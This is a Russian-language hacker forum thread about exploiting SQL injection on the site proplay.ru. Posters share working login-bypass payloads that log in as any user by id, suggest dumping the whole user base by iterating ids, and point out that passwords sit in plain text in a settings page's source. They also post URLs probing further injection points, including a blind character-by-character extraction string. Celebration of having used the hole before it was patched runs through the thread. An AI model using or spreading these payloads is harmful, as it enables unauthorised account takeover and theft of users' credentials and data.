Посодействовал l1ght, за что ему большое спасибо. Суть баги в том, что можно залогиниться под любым аккаунтом следующим способом:

Логин: -1
Пароль: ' union select id,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll/*

Где id - id юзера. :)

Как уже сказал гема хватает просто:
user'/*
asd

И ещё, если хотите узнать пароль - зайдите в /users/settings/ там будет пароль за звёздочками, открывайте сорцы страницы - там будет пароль в чистом виде...

Первый метод подойдет, скажем, для создания БД всех юзеров (путем перебора id).

Эх.... жаль перекрыли уже :)) Но я успел поюзать .... Респект авторам!!! :cool:

http://www.proplay.ru/forums/cs/7909'/
есть еще одна sql токо не как немогу подобрать правильное кол-во полей кто поможет?

:) Как подбираешь? Это не скуля, а просто бажок в скрипте, в частности, в инклудинге. Ничего там не поимеешь

З.Ы. Хотя сорри, затупил. Теперь вижу...

На счет union точно не знаю. Посимвольный перебор:
http://www.proplay.ru/forums/q3'+and+ascii(lower(substring(version(),1,1)))=0x3 5+and+'1'='1/MySQL 5.x